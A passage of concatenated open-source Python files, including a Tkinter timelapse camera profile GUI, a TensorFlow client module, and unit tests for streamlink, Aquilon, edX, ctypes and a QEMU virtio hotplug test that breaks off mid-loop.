self.variables['name'] = Tkinter.StringVar()
if(self.profile.jsonData['name'] != ''):
self.variables['name'].set(self.profile.jsonData['name'])
self.widgets['nameentry'] = Tkinter.Entry(self.widgets['tframe'], textvariable=self.variables['name'], bg=self.colours['inputbg'], fg=self.colours['inputfg'])
self.widgets['nameentry'].grid(column=1,row=self.gridrow,pady=10,sticky='W')
self.gridrow += 1
self.widgets['capLabel'] = Tkinter.Label(self.widgets['tframe'],text='Capture Mode', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['capLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.widgets['rmframe'] = Tkinter.Frame(self.widgets['tframe'], bg=self.colours['bg'])
self.widgets['rmframe'].grid(column=1,row=self.gridrow, sticky='W')
self.widgets['stillimg'] = Tkinter.PhotoImage(file = os.path.join(AmsEnvironment.AppPath(), 'images', 'camera','still.gif'))
self.widgets['recstillbutton'] = Tkinter.Button(self.widgets['rmframe'],text=u"Still", image=self.widgets['stillimg'], command=self.OnStillModeClick, bg=self.colours['bg'], activebackground=self.colours['bg'], highlightbackground=self.colours['buttonborder'])
self.widgets['recstillbutton'].grid(column=0,row=self.gridrow)
self.widgets['videoimg'] = Tkinter.PhotoImage(file = os.path.join(AmsEnvironment.AppPath(), 'images', 'camera','video.gif'))
self.widgets['recvidbutton'] = Tkinter.Button(self.widgets['rmframe'],text=u"Video", image=self.widgets['videoimg'], command=self.OnVideoModeClick, bg=self.colours['bg'], activebackground=self.colours['bg'], highlightbackground=self.colours['buttonborder'])
self.widgets['recvidbutton'].grid(column=1,row=self.gridrow)
self.widgets['recmodeLabel'] = Tkinter.Label(self.widgets['rmframe'],text='Video' if self.profile.jsonData['cap_mode'] == 'video' else 'Photo', anchor=W, bg=self.colours['bg'], fg=self.colours['valuefg'])
self.widgets['recmodeLabel'].grid(column=2,row=self.gridrow,padx=10, sticky='EW')
self.gridrow += 1
self.widgets['waitLabel'] = Tkinter.Label(self.widgets['tframe'],text='Wait', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['waitLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.widgets['waitframe'] = Tkinter.Frame(self.widgets['tframe'], bg=self.colours['bg'])
self.widgets['waitframe'].grid(column=1,row=self.gridrow,columnspan=2,sticky='EW')
self.gridrow += 1
self.widgets['profileLabel'] = Tkinter.Label(self.widgets['tframe'],text='Camera Profile', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['profileLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.variables['cam_profile'] = Tkinter.StringVar()
camProfile = self.profile.getCamProfile() if self.profile.jsonData['cam_profile'] != None else None
if(camProfile != None):
self.variables['cam_profile'].set(camProfile.jsonData['profile_name'])
else:
self.variables['cam_profile'].set(self.camera.cam_profile.jsonData['profile_name'])
names = Camera.CameraProfile.GetAllNames()
self.widgets['camproentry'] = Tkinter.OptionMenu(self.widgets['tframe'],self.variables['cam_profile'], *names)
self.widgets['camproentry'].config(bg=self.colours['inputbg'], fg=self.colours['inputfg'], activeforeground=self.colours['activefg'], activebackground=self.colours['activebg'])
self.widgets['camproentry'].grid(column=1,row=self.gridrow,sticky='W')
self.gridrow += 1
self.updateCapMode()
self.widgets['optionsFrame'] = Tkinter.Frame(self.widgets['tframe'], bg=self.colours['bg'])
self.widgets['optionsFrame'].grid(column=0,row=self.gridrow,columnspan=2, sticky='EW')
self.gridrow = 0
self.widgets['backLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Back', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['backLabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['saveLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Save', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['saveLabel'].grid(column=1,row=self.gridrow,sticky='EW')
if(self.profile.blobExists()):
self.widgets['deleteLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Delete', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['deleteLabel'].grid(column=2,row=self.gridrow,sticky='EW')
self.gridrow += 1
self.widgets['back'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Back", image=self.images['back'], command=self.OnManageClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['back'].grid(column=0,row=self.gridrow)
self.widgets['savepro'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Save Profile", image=self.images['save'], command=self.OnSaveProfileClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['savepro'].grid(column=1,row=self.gridrow)
if(self.profile.blobExists()):
self.widgets['deletepro'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Delete Profile", image=self.images['delete'], command=self.OnDeleteProfileClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['deletepro'].grid(column=2,row=self.gridrow)
def stillWaitOptions(self, rootElem):
""" partial view - adds elements for still options
@param rootElem
"""
if ('waitbody' in self.widgets):
self.widgets['waitbody'].grid_forget()
del(self.widgets['waitbody'])
self.widgets['waitbody'] = Tkinter.Frame(rootElem, bg=self.colours['bg'])
self.widgets['waitbody'].grid(column=0,row=0,columnspan=2, sticky='EW')
self.widgets['info1'] = Tkinter.Label(self.widgets['waitbody'],text='Capture an image every ', bg=self.colours['bg'], fg=self.colours['valuefg'], height=2)
self.widgets['info1'].grid(column=0,row=0,sticky='EW')
self.variables['still_wait'] = Tkinter.IntVar()
self.variables['still_wait'].set(self.profile.getWait())
self.widgets['waitentry'] = Tkinter.Entry(self.widgets['waitbody'], textvariable=self.variables['still_wait'], width=5, bg=self.colours['inputbg'], fg=self.colours['inputfg'])
self.widgets['waitentry'].grid(column=1,row=0,sticky='EW')
self.widgets['info1'] = Tkinter.Label(self.widgets['waitbody'],text=' seconds', bg=self.colours['bg'], fg=self.colours['valuefg'], height=2)
self.widgets['info1'].grid(column=2,row=0,sticky='EW')
def videoWaitOptions(self, rootElem):
""" partial view - adds elements for video options
@param rootElem
"""
if ('waitbody' in self.widgets):
self.widgets['waitbody'].grid_forget()
del(self.widgets['waitbody'])
self.widgets['waitbody'] = Tkinter.Frame(rootElem, bg=self.colours['bg'])
self.widgets['waitbody'].grid(column=0,row=0,columnspan=2, sticky='EW')
self.widgets['info1'] = Tkinter.Label(self.widgets['waitbody'],text='Capture ', bg=self.colours['bg'], fg=self.colours['valuefg'], height=2)
self.widgets['info1'].grid(column=0,row=0,sticky='EW')
self.variables['video_length'] = Tkinter.IntVar()
self.variables['video_length'].set(self.profile.jsonData['video_length'])
self.widgets['waitentry'] = Tkinter.Entry(self.widgets['waitbody'], textvariable=self.variables['video_length'], width=5, bg=self.colours['inputbg'], fg=self.colours['inputfg'])
self.widgets['waitentry'].grid(column=1,row=0,sticky='EW')
self.widgets['info2'] = Tkinter.Label(self.widgets['waitbody'],text=' seconds of footage every ', bg=self.colours['bg'], fg=self.colours['valuefg'], height=2)
self.widgets['info2'].grid(column=2,row=0,sticky='EW')
self.variables['video_wait'] = Tkinter.IntVar()
self.variables['video_wait'].set(self.profile.getWait())
self.widgets['waitentry'] = Tkinter.Entry(self.widgets['waitbody'], textvariable=self.variables['video_wait'], width=5, bg=self.colours['inputbg'], fg=self.colours['inputfg'])
self.widgets['waitentry'].grid(column=3,row=0,sticky='EW')
self.widgets['info3'] = Tkinter.Label(self.widgets['waitbody'],text=' seconds', bg=self.colours['bg'], fg=self.colours['valuefg'], height=2)
self.widgets['info3'].grid(column=4,row=0,sticky='EW')
def listMedia(self):
""" view - lists media items associated with a timelapse
"""
self.open()
self.widgets['mainlabel'] = Tkinter.Label(self.widgets['tframe'],text='Camera / Timelapse / Media', anchor=NW, bg=self.colours['bg'], fg=self.colours['headingfg'], font=self.fonts['heading'])
self.widgets['mainlabel'].grid(column=0,row=self.gridrow,columnspan=3,sticky='EW')
self.gridrow += 1
if (any(self.profile.jsonData['media'])):
self.widgets['timeLabel'] = Tkinter.Label(self.widgets['tframe'],text='#', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['timeLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.widgets['timeLabel'] = Tkinter.Label(self.widgets['tframe'],text='Time', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['timeLabel'].grid(column=1,row=self.gridrow,padx=10,sticky='W')
self.widgets['fileLabel'] = Tkinter.Label(self.widgets['tframe'],text='Filename', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['fileLabel'].grid(column=2,row=self.gridrow,padx=10,sticky='W')
self.gridrow += 1
rowcolour = self.colours['rowbg']
rowcount = 1
for x in self.profile.jsonData['media']:
rowcolour = self.colours['rowaltbg'] if rowcount % 2 == 0 else self.colours['rowbg']
self.widgets['numData{}'.format(x['time'])] = Tkinter.Label(self.widgets['tframe'],text='{}.'.format(rowcount), bg=rowcolour, fg=self.colours['headingfg'], height=2)
self.widgets['numData{}'.format(x['time'])].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['timeData{}'.format(x['time'])] = Tkinter.Label(self.widgets['tframe'],text=datetime.datetime.fromtimestamp(float(x['time'])/1000), bg=rowcolour, fg=self.colours['fg'], height=2)
self.widgets['timeData{}'.format(x['time'])].grid(column=1,row=self.gridrow,sticky='W')
self.widgets['fileData{}'.format(x['time'])] = Tkinter.Label(self.widgets['tframe'],text=x['filename'], bg=rowcolour, fg=self.colours['valuefg'], height=2)
self.widgets['fileData{}'.format(x['time'])].grid(column=2,row=self.gridrow,sticky='EW')
rowcount += 1
self.gridrow += 1
else:
self.widgets['noLabel'] = Tkinter.Label(self.widgets['tframe'],text='This profile has no media', anchor=W, bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['noLabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.gridrow += 1
self.widgets['optionsFrame'] = Tkinter.Frame(self.widgets['tframe'], bg=self.colours['bg'])
self.widgets['optionsFrame'].grid(column=0,row=self.gridrow,columnspan=2, sticky='EW')
self.gridrow = 0
self.widgets['backLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Back', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['backLabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['delLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Delete', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['delLabel'].grid(column=1,row=self.gridrow,sticky='EW')
self.gridrow += 1
self.widgets['back'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Back", image=self.images['back'], command=self.OnManageClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['back'].grid(column=0,row=self.gridrow)
self.widgets['del'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Delete", image=self.images['delete'], command=self.OnDeleteMediaClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['del'].grid(column=1,row=self.gridrow)
def deleteMedia(self):
""" view - delete media
"""
self.open()
self.widgets['mainlabel'] = Tkinter.Label(self.widgets['tframe'],text='Camera / Timelapse / Media / Delete', anchor=NW, bg=self.colours['bg'], fg=self.colours['headingfg'], font=self.fonts['heading'])
self.widgets['mainlabel'].grid(column=0,row=self.gridrow,columnspan=3,sticky='EW')
self.gridrow += 1
self.widgets['mLabel'] = Tkinter.Label(self.widgets['tframe'],text='{} item(s)'.format(len(self.profile.jsonData['media'])), bg=self.colours['bg'], fg=self.colours['headingfg'], font=self.fonts['heading2'])
self.widgets['mLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.gridrow += 1
self.widgets['metaLabel'] = Tkinter.Label(self.widgets['tframe'],text='Clear Meta Data', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['metaLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.variables['meta'] = Tkinter.BooleanVar()
self.variables['meta'].set(True)
self.widgets['metaentry'] = Tkinter.Checkbutton(self.widgets['tframe'], variable=self.variables['meta'], text='', anchor=W, bg=self.colours['inputbg'], fg=self.colours['inputfg'], activebackground=self.colours['activebg'], selectcolor=self.colours['inputbg'], disabledforeground=self.colours['greyborder'])
self.widgets['metaentry'].grid(column=1,row=self.gridrow, padx=5, sticky="W")
self.gridrow += 1
self.widgets['mediaLabel'] = Tkinter.Label(self.widgets['tframe'],text='Delete Media Files', bg=self.colours['bg'], fg=self.colours['fg'])
self.widgets['mediaLabel'].grid(column=0,row=self.gridrow,padx=10,sticky='W')
self.variables['media'] = Tkinter.BooleanVar()
self.variables['media'].set(True)
self.widgets['mediaentry'] = Tkinter.Checkbutton(self.widgets['tframe'], variable=self.variables['media'], text='', anchor=W, command=self.OnToggleDeleteMedia, bg=self.colours['inputbg'], fg=self.colours['inputfg'], activebackground=self.colours['activebg'], selectcolor=self.colours['inputbg'], disabledforeground=self.colours['greyborder'])
self.widgets['mediaentry'].grid(column=1,row=self.gridrow, padx=5, sticky="W")
self.gridrow += 1
self.widgets['optionsFrame'] = Tkinter.Frame(self.widgets['tframe'], bg=self.colours['bg'])
self.widgets['optionsFrame'].grid(column=0,row=self.gridrow,columnspan=2, sticky='EW')
self.gridrow = 0
self.widgets['backLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Back', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['backLabel'].grid(column=0,row=self.gridrow,sticky='EW')
self.widgets['delLabel'] = Tkinter.Label(self.widgets['optionsFrame'],text='Accept', bg=self.colours['bg'], fg=self.colours['fg'], height=2)
self.widgets['delLabel'].grid(column=1,row=self.gridrow,sticky='EW')
self.gridrow += 1
self.widgets['back'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Back", image=self.images['back'], command=lambda x = self.profile.jbIndex: self.OnMediaClick(x), bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['back'].grid(column=0,row=self.gridrow)
self.widgets['savemap'] = Tkinter.Button(self.widgets['optionsFrame'],text=u"Save Map", image=self.images['save'], command=self.OnDeleteMediaConfirmClick, bg=self.colours['buttonbg'], activebackground=self.colours['buttonhighlightbg'], highlightbackground=self.colours['buttonborder'])
self.widgets['savemap'].grid(column=1,row=self.gridrow)
#=== ACTIONS ===#
def OnManageClick(self):
""" action - manage timelapse
"""
self.profiles = JsonBlob.JsonBlob.all('Timelapse', 'TimelapseProfile')
self.listProfiles()
def OnAddProfileClick(self):
""" action - display add profile page
"""
self.profile = Timelapse.TimelapseProfile()
self.editProfile()
def OnEditProfileClick(self, index):
""" action - display edit profile page
@param index
"""
self.profile = Timelapse.TimelapseProfile(index)
if (self.profile.blobExists()):
self.editProfile()
def OnSaveProfileClick(self):
""" action - saves a profile
"""
if (hasattr(self, 'profile')):
name = self.variables['name'].get()
waitError = False
try:
wait = int(self.variables['{}_wait'.format(self.profile.jsonData['cap_mode'])].get())
except:
wait = 10
waitError = True
lengthError = False
try:
length = int(self.variables['video_length'].get()) if self.profile.jsonData['cap_mode'] == 'video' else 0
except:
length = 1
lengthError = True
profile = self.variables['cam_profile'].get()
if (len(name) < 2):
self.notifier.addNotice('Name too short','error')
return
if (waitError):
self.notifier.addNotice('Invalid wait value','error')
return
if (lengthError):
self.notifier.addNotice('Invalid length value','error')
return
if (not self.profile.blobExists() and name in Timelapse.TimelapseProfile.GetAllNames()):
self.notifier.addNotice('A timelapse with that name already exists','error')
return
elif (self.profile.blobExists() and name != self.profile.jsonData['name'] and name in Timelapse.TimelapseProfile.GetAllNames()):
self.notifier.addNotice('A timelapse with that name already exists','error')
return
if (wait < 1):
self.notifier.addNotice('Wait time must be at least 1','error')
return
if (self.profile.jsonData['cap_mode'] == 'video'):
if (length < 1):
self.notifier.addNotice('Footage time must be at least 1','error')
return
elif(length > wait -1):
self.notifier.addNotice('Footage time must be less than wait time','error')
return
self.profile.jsonData['video_length'] = length #commit length
camProfile = [x for x in Camera.CameraProfile.GetAll().values() if x.jsonData['profile_name'] == profile]
if (not any(camProfile)):
self.notifier.addNotice('Invalid profile name: {}'.format(profile),'error')
return
else:
self.profile.jsonData['cam_profile'] = camProfile[0].jbIndex
self.profile.jsonData['name'] = name
self.profile.jsonData['{}_wait'.format(self.profile.jsonData['cap_mode'])] = wait
self.profile.save()
Timelapse.TimelapseProfile.ClearCache()
self.OnManageClick()
self.notifier.addNotice('Timelapse profile saved')
def OnDeleteProfileClick(self):
""" action - deletes a profile
"""
if (hasattr(self, 'profile') and self.profile.blobExists()):
self.profile.delete()
Timelapse.TimelapseProfile.ClearCache()
self.OnManageClick()
def OnStillModeClick(self):
""" action - switch to still mode
"""
if (hasattr(self, 'profile')):
self.profile.jsonData['cap_mode'] = 'still'
self.updateCapMode()
def OnVideoModeClick(self):
""" action - switch to video mode
"""
if (hasattr(self, 'profile')):
self.profile.jsonData['cap_mode'] = 'video'
self.updateCapMode()
def OnToggleActive(self, index = None):
""" action - handle active checkbox
@param index
"""
if (self.profile.jsonData['active']):
self.profile.jsonData['active'] = False
else:
self.profile.jsonData['active'] = True
def OnActivateClick(self, index):
""" action - handle activate button
@param index
"""
profile = Timelapse.TimelapseProfile(index)
if (profile.blobExists()):
if (profile.jsonData['active']):
profile.jsonData['active'] = False
else:
profile.jsonData['active'] = True
profile.save()
self.widgets['actButton{}'.format(index)].configure(image=self.images['stop'] if profile.jsonData['active'] else self.images['play'])
Timelapse.TimelapseProfile.ClearCache()
def OnMediaClick(self, index):
""" action - display media items page
@param index
"""
self.profile = Timelapse.TimelapseProfile(index)
if (self.profile.blobExists()):
self.listMedia()
def OnDeleteMediaClick(self):
""" action - display delete media page
"""
self.deleteMedia()
def OnDeleteMediaConfirmClick(self):
""" action - delete media items
"""
res = {
'success': 0,
'missing': 0,
'meta': False
}
if (self.variables['media'].get()):
for x in self.profile.jsonData['media']:
path = os.path.join(x['path'], x['filename'])
if (os.path.exists(path)):
os.remove(path)
res['success'] += 1
else:
res['missing'] += 1
if (self.variables['meta'].get()):
self.profile.jsonData['media'] = []
self.profile.save()
res['meta'] = True
self.notifier.addNotice('{} files deleted, {} missing. Meta data {}'.format(res['success'],res['missing'],'cleared' if res['meta'] else 'preserved'))
self.OnMediaClick(self.profile.jbIndex)
def OnToggleDeleteMedia(self):
""" action - allows media to be preserved but meta data gets wiped
"""
if (self.variables['media'].get() and not self.variables['meta'].get()):
self.variables['meta'].set(True)
def updateCapMode(self):
""" util - updates the capture mode state
"""
capMode = self.profile.jsonData['cap_mode']
if (capMode == 'still'):
self.widgets['recstillbutton'].configure(state='disabled')
self.widgets['recvidbutton'].configure(state='normal')
self.stillWaitOptions(self.widgets['waitframe'])
else:
self.widgets['recstillbutton'].configure(state='normal')
self.widgets['recvidbutton'].configure(state='disabled')
self.videoWaitOptions(self.widgets['waitframe'])
self.widgets['recmodeLabel'].configure(text='Video' if capMode == 'video' else 'Photo') | gpl-2.0 |
SnakeJenny/TensorFlow | tensorflow/python/client/client_lib.py | 111 | 1698 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Support for launching graphs and executing operations.
See the @{$python/client} guide.
@@Session
@@InteractiveSession
@@get_default_session
@@OpError
@@CancelledError
@@UnknownError
@@InvalidArgumentError
@@DeadlineExceededError
@@NotFoundError
@@AlreadyExistsError
@@PermissionDeniedError
@@UnauthenticatedError
@@ResourceExhaustedError
@@FailedPreconditionError
@@AbortedError
@@OutOfRangeError
@@UnimplementedError
@@InternalError
@@UnavailableError
@@DataLossError
@@exception_type_from_error_code
@@error_code_from_exception_type
@@raise_exception_on_not_ok_status
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.python.client.session import InteractiveSession
from tensorflow.python.client.session import Session
from tensorflow.python.framework import errors
from tensorflow.python.framework.errors import OpError
from tensorflow.python.framework.ops import get_default_session
| apache-2.0 |
javiercantero/streamlink | tests/test_plugin_srgssr.py | 6 | 1345 | import unittest
from streamlink.plugins.srgssr import SRGSSR
class TestPluginSRGSSR(unittest.TestCase):
def test_can_handle_url(self):
# should match
self.assertTrue(SRGSSR.can_handle_url("http://srf.ch/play/tv/live"))
self.assertTrue(SRGSSR.can_handle_url("http://www.rsi.ch/play/tv/live#?tvLiveId=livestream_La1"))
self.assertTrue(SRGSSR.can_handle_url("http://rsi.ch/play/tv/live?tvLiveId=livestream_La1"))
self.assertTrue(SRGSSR.can_handle_url("http://www.rtr.ch/play/tv/live"))
self.assertTrue(SRGSSR.can_handle_url("http://rtr.ch/play/tv/live"))
self.assertTrue(SRGSSR.can_handle_url("http://rts.ch/play/tv/direct#?tvLiveId=3608506"))
self.assertTrue(SRGSSR.can_handle_url("http://www.srf.ch/play/tv/live#?tvLiveId=c49c1d64-9f60-0001-1c36-43c288c01a10"))
self.assertTrue(SRGSSR.can_handle_url("http://www.rts.ch/sport/direct/8328501-tennis-open-daustralie.html"))
self.assertTrue(SRGSSR.can_handle_url("http://www.rts.ch/play/tv/tennis/video/tennis-open-daustralie?id=8328501"))
# shouldn't match
self.assertFalse(SRGSSR.can_handle_url("http://www.crunchyroll.com/gintama"))
self.assertFalse(SRGSSR.can_handle_url("http://www.crunchyroll.es/gintama"))
self.assertFalse(SRGSSR.can_handle_url("http://www.youtube.com/"))
| bsd-2-clause |
quattor/aquilon | tests/broker/test_update_dns_environment.py | 2 | 2249 | #!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2014,2015,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the add dns environment command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from brokertest import TestBrokerCommand
class TestUpdateDnsEnvironment(TestBrokerCommand):
def test_100_update_comments(self):
self.noouttest(["update_dns_environment", "--dns_environment", "ut-env",
"--comments", "New DNS env comments"])
def test_105_verify_update(self):
command = ["show", "dns", "environment", "--dns_environment", "ut-env"]
out = self.commandtest(command)
self.matchoutput(out, "DNS Environment: ut-env", command)
self.matchoutput(out, "Comments: New DNS env comments", command)
def test_110_clear_comments(self):
self.noouttest(["update_dns_environment", "--dns_environment", "ut-env",
"--comments", ""])
def test_115_verify_comments(self):
command = ["show", "dns", "environment", "--dns_environment", "ut-env"]
out = self.commandtest(command)
self.matchclean(out, "Comments", command)
def test_200_update_nonexistent(self):
command = ["update", "dns", "environment",
"--dns_environment", "no-such-env"]
out = self.notfoundtest(command)
self.matchoutput(out, "DNS Environment no-such-env not found.", command)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestUpdateDnsEnvironment)
unittest.TextTestRunner(verbosity=2).run(suite)
| apache-2.0 |
inares/edx-platform | common/test/acceptance/performance/test_lms_performance.py | 103 | 4363 | """
Single page performance tests for LMS.
"""
from bok_choy.web_app_test import with_cache
from ..pages.lms.auto_auth import AutoAuthPage
from ..pages.lms.courseware import CoursewarePage
from ..pages.lms.dashboard import DashboardPage
from ..pages.lms.course_info import CourseInfoPage
from ..pages.lms.login import LoginPage
from ..pages.lms.progress import ProgressPage
from ..pages.common.logout import LogoutPage
from ..fixtures.course import CourseFixture, XBlockFixtureDesc, CourseUpdateDesc
from ..tests.helpers import UniqueCourseTest, load_data_str
from nose.plugins.attrib import attr
@attr(har_mode='explicit')
class LmsPerformanceTest(UniqueCourseTest):
"""
Base class to capture LMS performance with HTTP Archives.
"""
username = 'test_student'
email = '[email protected]'
def setUp(self):
"""
Setup course
"""
super(LmsPerformanceTest, self).setUp()
# Install a course with sections/problems, tabs, updates, and handouts
course_fix = CourseFixture(
self.course_info['org'], self.course_info['number'],
self.course_info['run'], self.course_info['display_name']
)
course_fix.add_update(CourseUpdateDesc(date='January 29, 2014', content='Test course update1'))
course_fix.add_update(CourseUpdateDesc(date='January 30, 2014', content='Test course update2'))
course_fix.add_update(CourseUpdateDesc(date='January 31, 2014', content='Test course update3'))
course_fix.add_children(
XBlockFixtureDesc('chapter', 'Test Section 1').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection 1').add_children(
XBlockFixtureDesc('problem', 'Test Problem 1', data=load_data_str('multiple_choice.xml')),
XBlockFixtureDesc('problem', 'Test Problem 2', data=load_data_str('formula_problem.xml')),
XBlockFixtureDesc('html', 'Test HTML', data="<html>Html child text</html>"),
)
),
XBlockFixtureDesc('chapter', 'Test Section 2').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection 2').add_children(
XBlockFixtureDesc('html', 'Html Child', data="<html>Html child text</html>")
)
),
XBlockFixtureDesc('chapter', 'Test Section 3').add_children(
XBlockFixtureDesc('sequential', 'Test Subsection 3').add_children(
XBlockFixtureDesc('problem', 'Test Problem 3')
)
)
).install()
AutoAuthPage(self.browser, username=self.username, email=self.email, course_id=self.course_id).visit()
def _make_har_file(self, page):
"""
Visit page and make HAR file.
"""
har_name = '{page}_{course}'.format(page=type(page).__name__, course=self.course_info['number'])
self.har_capturer.add_page(self.browser, har_name)
page.visit()
self.har_capturer.save_har(self.browser, har_name)
@with_cache
def test_visit_coursware(self):
"""
Produce a HAR for loading the Coursware page.
"""
courseware_page = CoursewarePage(self.browser, self.course_id)
self._make_har_file(courseware_page)
@with_cache
def test_visit_dashboard(self):
"""
Produce a HAR for loading the Dashboard page.
"""
dashboard_page = DashboardPage(self.browser)
self._make_har_file(dashboard_page)
@with_cache
def test_visit_course_info(self):
"""
Produce a HAR for loading the Course Info page.
"""
course_info_page = CourseInfoPage(self.browser, self.course_id)
self._make_har_file(course_info_page)
@with_cache
def test_visit_login_page(self):
"""
Produce a HAR for loading the Login page.
"""
login_page = LoginPage(self.browser)
# Logout previously logged in user to be able to see Login page.
LogoutPage(self.browser).visit()
self._make_har_file(login_page)
@with_cache
def test_visit_progress_page(self):
"""
Produce a HAR for loading the Progress page.
"""
progress_page = ProgressPage(self.browser, self.course_id)
self._make_har_file(progress_page)
| agpl-3.0 |
mindbender-studio/setup | bin/windows/python36/Lib/ctypes/test/test_varsize_struct.py | 277 | 1842 | from ctypes import *
import unittest
class VarSizeTest(unittest.TestCase):
def test_resize(self):
class X(Structure):
_fields_ = [("item", c_int),
("array", c_int * 1)]
self.assertEqual(sizeof(X), sizeof(c_int) * 2)
x = X()
x.item = 42
x.array[0] = 100
self.assertEqual(sizeof(x), sizeof(c_int) * 2)
# make room for one additional item
new_size = sizeof(X) + sizeof(c_int) * 1
resize(x, new_size)
self.assertEqual(sizeof(x), new_size)
self.assertEqual((x.item, x.array[0]), (42, 100))
# make room for 10 additional items
new_size = sizeof(X) + sizeof(c_int) * 9
resize(x, new_size)
self.assertEqual(sizeof(x), new_size)
self.assertEqual((x.item, x.array[0]), (42, 100))
# make room for one additional item
new_size = sizeof(X) + sizeof(c_int) * 1
resize(x, new_size)
self.assertEqual(sizeof(x), new_size)
self.assertEqual((x.item, x.array[0]), (42, 100))
def test_array_invalid_length(self):
# cannot create arrays with non-positive size
self.assertRaises(ValueError, lambda: c_int * -1)
self.assertRaises(ValueError, lambda: c_int * -3)
def test_zerosized_array(self):
array = (c_int * 0)()
# accessing elements of zero-sized arrays raise IndexError
self.assertRaises(IndexError, array.__setitem__, 0, None)
self.assertRaises(IndexError, array.__getitem__, 0)
self.assertRaises(IndexError, array.__setitem__, 1, None)
self.assertRaises(IndexError, array.__getitem__, 1)
self.assertRaises(IndexError, array.__setitem__, -1, None)
self.assertRaises(IndexError, array.__getitem__, -1)
if __name__ == "__main__":
unittest.main()
| mit |
CongSmile/tp-qemu | qemu/tests/virtio_port_hotplug.py | 6 | 3479 | import time
import logging
from autotest.client.shared import error
from avocado.core import exceptions
from virttest.qemu_devices import qdevices
@error.context_aware
def run(test, params, env):
"""
Test hot unplug virtio serial devices.
1) Start guest with virtio serial device(s).
2) Load module in guest os.
3) For each of the virtio serial ports, do following steps one by one:
3.1) Unload module in guest
3.2) Hot-unplug the virtio serial port
3.3) Hotplug the devices
3.4) Reload module in the guest
4) Repeat step2,3 100 times
5) Reboot VM to make sure the guest kernel not panic.
:param test: QEMU test object.
:param params: Dictionary with the test parameters.
:param env: Dictionary with test environment.
"""
def get_virtio_port_by_name(vm, name):
"""
Get virtio port object by name in VM.
:param name: name of the port
"""
for device in vm.devices:
if isinstance(device, qdevices.QDevice):
if device.get_param("name") == name:
return device
return None
def get_virtio_port_name_by_params(params, tag):
"""
Get virtio port name via params according tag.
:param params: test params.
:param tag: port name or tag(eg, vc1).
"""
prefix = params.get('virtio_port_name_prefix')
index = params.objects("virtio_ports").index(tag)
if prefix:
return "%s%d" % (prefix, index)
return tag
vm = env.get_vm(params["main_vm"])
vm.verify_alive()
timeout = int(params.get("login_timeout", 360))
for repeat in xrange(int(params.get("repeat_times", 1))):
repeat += 1
